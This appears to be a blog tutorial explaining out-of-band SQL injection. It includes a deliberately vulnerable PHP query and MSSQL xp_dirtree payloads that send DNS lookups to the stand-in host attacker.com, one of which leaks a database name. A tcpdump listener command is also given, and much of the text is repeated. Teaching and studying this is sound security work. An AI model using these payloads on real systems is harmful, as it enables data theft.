Thilan Dissanayaka Web App Hacking Apr 26

Out of Band SQL Injection

Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

Problems:

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

What is Out-of-Band (OOB) SQL Injection? Normally in SQL Injection, the attacker:

Sees direct errors, or

Infers information through page behavior or timing.

But Out-of-Band SQL Injection is different:

OOB SQLi relies on making the vulnerable database initiate a network connection (like HTTP or DNS) to an attacker-controlled server to leak data.

This is useful when:

Errors are hidden,

No differences in page behavior,

No timing differences.

Example:

The vulnerable server sends a DNS or HTTP request to attacker.com containing database data.

How Out-of-Band SQL Injection Works Some databases have functions that allow making external network connections:

Database Functions MySQL LOAD_FILE(), INTO OUTFILE, xp_dirtree() (when MySQL linked to MSSQL) Microsoft SQL Server xp_dirtree(), xp_fileexist() Oracle UTL_HTTP.REQUEST, UTL_INADDR.GET_HOST_ADDRESS An attacker can exploit these features to:

Force a DNS lookup

Trigger an HTTP request

Leak data through those requests.

Real-World Example Setup Imagine a PHP page like:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
    $row = mysqli_fetch_assoc($result);
    echo "Product Name: " . $row['name'];
}
?>

User input is directly injected into SQL

No output-based or time-based feedback

Example OOB SQL Injection Exploit Assume the database is MSSQL Server and has access to the internet. We can use the function xp_dirtree() to trigger a network request.

Injection payload:

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

'; EXEC master..xp_dirtree '\\attacker.com\test' --

Full URL:

http://victim.com/product.php?id='; EXEC master..xp_dirtree '\\attacker.com\test'--

What happens?

The database server tries to list the contents of the share \attacker.com\test

A DNS lookup happens for attacker.com

The attacker sees the request and knows the SQL injection worked!

Another Example: Leaking Data You can even exfiltrate data!

Example payload:

'; EXEC master..xp_dirtree '\\' + (SELECT TOP 1 name FROM master..sysdatabases) + '.attacker.com\abc' --

If the first database name is 'testdb', the database server will try to access:

testdb.attacker.com

If you monitor your domain’s DNS logs, you can see the database name!

Setting Up the Attacker's Server You need to set up:

A DNS listener (example: using tcpdump, dnsmasq, Burp Collaborator, or Interactsh)

Or a web server to catch HTTP requests.

Simple using tcpdump to catch DNS:

sudo tcpdump -i eth0 port 53

Or use public services like:

Interactsh (by Project Discovery)

Burp Collaborator client

They give you a domain like random.oastify.com, and log incoming requests.

ALSO READ
GDB reverse engineering tutorial
Mar 23 Web App Hacking

hiii, I selected an interesting topic to discuss. Here, we are going to disassemble a binary file and take a look at what it does. This process is called reverse engineering. Let's run the program....

Remote Command Execution
Mar 23 Web App Hacking

Remote Command Execution (RCE) is a critical security vulnerability that allows an attacker to execute arbitrary commands on a remote server. This vulnerability can lead to unauthorized access, data....

Build A Simple Web shell
Mar 23 Web App Hacking

A web shell is a type of code that hackers use to gain control over a web server. It is particularly useful for post-exploitation attacks, and there are various types of web shells available. Some of....

Time based Blind SQL Injection
Apr 26 Web App Hacking

Blind SQL Injection happens when: There is a SQL injection vulnerability, BUT the application does not show any SQL errors or query outputs directly. In this case, an attacker has to ask....

Termux command list
Apr 26 Uncategorized

Termux is a terminal emulator application for mobile devices. In this document, we are going to talk about Termux and its features. We can use it to install Linux tools on a mobile phone. Here you....

Building a Web3 CLI Tool for the Ballerina Language: From Idea to Reality
Apr 26 Ballerina

🚀 Excited to finally share my journey of building a web3 CLI tool for Ballerina! This tool bridges the gap between Ethereum smart contracts and the Ballerina programming language by automatically....